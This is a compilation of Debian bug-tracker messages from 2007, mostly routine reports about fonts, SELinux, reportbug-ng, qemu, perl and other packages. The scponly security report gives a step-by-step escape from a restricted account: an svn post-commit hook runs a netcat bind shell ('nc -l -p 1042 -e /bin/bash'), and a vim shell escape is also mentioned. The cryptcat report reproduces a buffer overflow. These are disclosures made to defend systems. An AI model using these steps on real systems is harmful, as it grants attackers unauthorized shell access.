Bug#427447: Workaround for bug!
In all the directories that fc-cache failed with errors like: /usr/share/fonts: failed to write cache /usr/share/fonts/X11: failed to write cache /usr/share/fonts/type1: failed to write cache /usr/local/share/fonts: failed to write cache I went to each directory and ran (as root) mkfontdir ; mkfontscale Only when both were run in each of the problematic directories, did the problem go away, which doesn't explain why its happening. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Bug#434234: selinux-policy-refpolicy-strict: config has targeted policy instead of strict.
On Mon, Aug 06, 2007 at 09:43:17AM -0500, Manoj Srivastava wrote: So, if you want strict policy, you need to install it, label the file system, and manually switch to it, using the /etc/selinux/config manually. Doing it in that order doesn't really work. You first need to switch the policy and then relabel it. I did first relabel it while it was still set to targetted policy. I assumed it loaded the strict policy, but it wasn't. Since I didn't actually have the targetted policy installed, there wasn't any policy loaded at all, and it decided to label everything to be in the kernel context. Secondly, since that file is a configuration file, it is not easy for packages to just go and edit it. It doesn't seem to be a config file to dpkg. I have no idea which package made that file. I would have filed the bug against that package if I did. In any case, a debconf question asking about which of the policies you want to use and don't prompt if you only have 1 of them installed would be nice. Your message dated Fri, 10 Aug 2007 18:45:32 +0200 with message-id [EMAIL PROTECTED] and subject line Undeclared (and unresolved) dependency on libstdc++-libc6.1-1.so.2 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. Package: reportbug-ng Version: 0.2007.07.19 Severity: grave Justification: renders package unusable (cc'ed to #437020: apt-listbugs fails with W: Mandatory parameter 'bug' missing in call) reportbug-ng stop working on my system recently (though I can't tell the precise date at which it started being unusable, I'm sure this precise version of rng used to work on my system). When I search for bugreports to any package, the following error informations appear on the console (see end of message). This error looks really similar to the one reported in #437020 (hence the CC). I think it's due to a dependency, not to rng or apt-listbugs themselves, but I can't find which dependency is guilty... Bug#437157: wmbubble segfaults
But it doesn't segfault if -d or -u options are set. It's that damn duck! It says memory usage is 66% - duck is near top - perhaps about to go upside-down. If I reduce memory usage then it starts OK and doesn't seem to die when I increase memory use again. Not very consistent so hard to be sure. Bug#437142: perl-base should include unicore/PVA.pl

I'd just let you know. As a possible fix, I suggest adding PVA.pl from perl-modules to perl-base (only 18k) Moving utf8_heavy.pl to perl-modules (which provides PVA.pl) does not seem correct as utf8_heavy.pl is itself required by /usr/share/perl/5.8.8/utf8.pm Indeed. Bug#431010: cryptcat patch for farm9crypt_read()
Good day, I think I found the problem of this bug. There is an overflow bug in farm9crypt_read() in farm9crypt.cc, which is triggered when a message larger than 8192 bytes is received by cryptcat. The received message will overwrite the decryptor pointer, also declared in farm9crypt.cc, which is used to decrypt an incoming message: farm9crypt.cc:60: static TwoFish* decryptor = NULL; To reproduce, start listening with a cryptcat: $ cryptcat -l -p 12345 received.bin Then send big file with another cryptcat to the listening cryptcat: $ perl -e 'print Ax(1024000*20)' BIGFILE $ cat received.bin | cryptcat 127.0.0.1 12345 The following gdb output illustrates the overflow: debianvm:/tmp# gdb ./cryptcat GNU gdb 6.6-debian Copyright (C) 2006 Free Software Foundation, Inc. Bug#435039: closed by Miguel Gea Milvaques [EMAIL PROTECTED] (qemuctl: fails to start)
I have tried to uninstall completely qemu-launcher and qemuctl and install it over again and still doesn't work. This is the command line of qemuctl as launched from qemu-launcher: /usr/bin/qemuctl -boot c -m 768 -hda '/var/chroot/qemu-windowsxp' -cdrom '/dev/dvd' -net nic,vlan=0 -net user,vlan=0 -smb /home/ivan -localtime -soundhw sb16 -std-vga -kernel-kqemu -usb -usbdevice host:04b8:0007 I have run strace on it and I have found that qemu is telling qemuctl that parameter -kernel-kqemu is invalid. It is clearly a qemu-launcher error. This is what is happening when I select in qemu-launcher: -System type = x86_64 -Provide a control panel = checked -Acceleration = full qemuctl is launched with -kernel-kqemu parameter and qemuctl tries to launch /usr/bin/qemu, which complains about the parameters and makes qemuctl disappear. It would be a good idea to tell something to the user about the error in qemuctl. This is what is happening when I select in qemu-launcher: -System type = x86_64 -Provide a control panel = unchecked -Acceleration = full qemu is launched via /usr/bin/qemu-system-x86_64 which, in fact, DOES understand the -kernel-kqemu parameter, thus working correctly. So, you can reproduce the problem with the first configuration. I suppose that two things should be done: 1) Improve qemuctl so it says something whenever it detects an error of qemu 2) Change qemu-launcher so it tells qemuctl to launch the proper qemu flavor

Bug#437154: reportbug-ng: rng fails to retrieve bug reports (see also #437020)
reassign 437154 debbugs stop [CC'ing Don, the developer of debbugs] Hi, thanks for your bug report. I've noticed this behavior this morning too. The problem lies in our Bug Tracking System which had a minor change in it's SOAP interface a few hours ago. I assume the change was meant to be backwards compatible with the old behavior of the SOAP interface and therefor believe the current behavior is a bug on debbugs side. Don, feel free to re-reassign this bug to rng if you think this change you made is permanent and I should rather fix it on my side. Bug#437148: Security Hole in scponly, due to svn support
Package: scponly Version: 4.6-1 X-Debbugs-CC: [EMAIL PROTECTED] Severity: grave Tags: security Hi Thomas Wana, messing around with some friends here, I tried to access his computer with only a scponly protected account. I discovered this way of gaining full shell access: I locally created a subversion repository /tmp/blubb with a /tmp/blubb/hooks/post-commit that contains the command: ( nc -l -p 1042 -e /bin/bash) I copy this repositry using scp -r /tmp/blubb/ [EMAIL PROTECTED]: Then I check out the repository remotely: ssh [EMAIL PROTECTED] /usr/bin/svn co file:///home/user/blubb bla Now I add a file and commit it: touch blah scp blah [EMAIL PROTECTED]:bla/ ssh [EMAIL PROTECTED] /usr/bin/svn ci bla At this point, I have a vim instance running, asking me for the commit message. I could now just run :!/bin/bash to get a shell, but having done the post-commit hook already, I want to use that, so I write something and quit the editor with :x At this point, I can use nc host 1042 and I have a shell for the account that should have none. The solution would be: Do not enable access to svn (or svnserve), which is a simple compilation option. I’d appreciate it if this gets fixed in debian etch. I have sent this information to [EMAIL PROTECTED] and scponly’s upstream maintainer last week, but have not yet gotten a response. Hi, The version of icedove that you're seeing in testing is actually from testing-security. The icedove version currently in unstable, and the corresponding version of traybiff both work together fine, but are unable to enter testing yet because of various reasons. I am slightly confused though about the message you quoted above - did you try and manually install the version in etch-proposed-updates on testing? Bug#428202: subversion builds fine here
Hi I just built subversion in a sid-chroot and in my pbuilder/cowbuilder on i386. It built through. The build log said that a few tests were skipped, but I do not see any errors. Can we at least lower the severity of this bugreport, because it blocks the migration of a security fix (CVE-2007-2448)[0] in subversion for testing. Bug#437091: kpilotDaemon hangs when usb: is used as handheld device
Subject: kpilotDaemon hangs when usb: is used as handheld device Package: kpilot Version: 4:3.5.5.dfsg.1-6 Severity: critical Justification: breaks unrelated software *** Please type your report below this line *** When kpilotDaemon is run having configured usb: as the handheld device (instead of /dev/ttyUSB0 or similar), kpilotDaemon hangs on a nanosleep call. This causes: - kpilotDaemon icon in system tray appear transparent (totally empty square) - KPilot stop with progress bar indicating 10% of sync (if kpilotDaemon is launched by kdeinit) - KPilot hang if kpilotDaemon was not previously launched and KPilot has to launch it And the critical issue: - Any other program which tries to contact kpilotDaemon hangs. For example: kdcop I can send straces or anything else you ask for. The only reason why I filed this bug critical is that it can make other packages hang, but I don't consider it a critical issue as I have not found any other program, apart from kdcop, hanging. Perhaps severity can be lowered, I don't know Debian policies about this type of bugs. gnome-media-common is already installed on both machines. reassign 436166 linux-2.6 retitle 436166 Please ship bttv.h in linux-headers-* stop Hi, I think the only missing part for lirc to build its module out of tree would be to have bttv.h in linux-headers-* packages; could you please add it? Thanks, -- Loïc Minier

Bug#427447: Workaround for bug!
On Fri, Aug 10, 2007 at 02:46:52AM -0400, Greg Folkert wrote: In all the directories that fc-cache failed with errors like: /usr/share/fonts: failed to write cache /usr/share/fonts/X11: failed to write cache /usr/share/fonts/type1: failed to write cache /usr/local/share/fonts: failed to write cache I went to each directory and ran (as root) mkfontdir ; mkfontscale Only when both were run in each of the problematic directories, did the problem go away, which doesn't explain why its happening. I wonder if this process is just missing from some package? As I reported back to this bug, At some point the error just went away from my aptitude stuff. So I must have inadvertantly installed some other package that fixed it up. Not much help I know, but I'm willing to send my aptitude log is anyoen wants it. Bug#421503: telnetd-ssl resets ssl settings on upgrade

Everything looks fine, but there's one thing I don't understand (but I'm not very well versed on update-inetd, so that's the likely cause): why you only keep the arguments if the telnet inetd.conf line was *disabled*?: args=`grep '^#off#.*/usr/sbin/in.telnetd' etc. ^^^ Because at that point the prerm has already run and disabled the inetd entry. Btw, instead of sed 's/.*\/usr\/sbin\/in.telnetd\(.*\)/\1/'`, you can do sed 's#.*/usr/sbin/in.telnetd...#\1#', or eny other character instead of #, like , or |. Thanks, I knew you could do that in perl, but I didn't realise sed supported it too. Bug#434329: mail-notification crashes
Hi, Archived packages of gmime2.0 version 2.2.9 can be found at http://snapshot.debian.net/archive/2007/07/22/debian/pool/main/g/gmime2.2/ Maybe the bug can be reproduced in a debug build when it is compiled with the -dev package in version 2.2.9 and then run with 2.2.10? P.S. if you are affected by this bug, you can probably download the libgmime package from there and install it. Then use aptitude hold libgmime-2.0-2 to prevent it from being automatically upgraded on your next upgrade run. best regards, Erich Schubert -- erich@(vitavonni.de|debian.org)--GPG Key ID: 4B3A135C(o_ Friends are those who reach out for //\ your hand but touch your heart. Bug#437020: This is a bug in debbugs, not in apt-listbugs
Hi According to the message from Bastian Venthur in the bug #437154 (a similar bug affecting reportbug-ng), this is due to a change in debbugs. This bug has been corrected now, and apt-listbugs is working again. Should we close this bug? (sorry, I'm kind of a newbie, and I don't feel confident enough to close the bug myself by directly sending this email to [EMAIL PROTECTED]) Khapin signature.asc Description: Digital signature
Bug#437222: asterisk: Depends on libpri1.0 = 1.4, should this be libpri1.2 = 1.4?
Package: asterisk Version: 1:1.4.10~dfsg-1 Severity: grave Justification: renders package unusable Hi, Currently asterisk is not installable because it depends on libpri1.0 = 1.4 which doesn't exist.
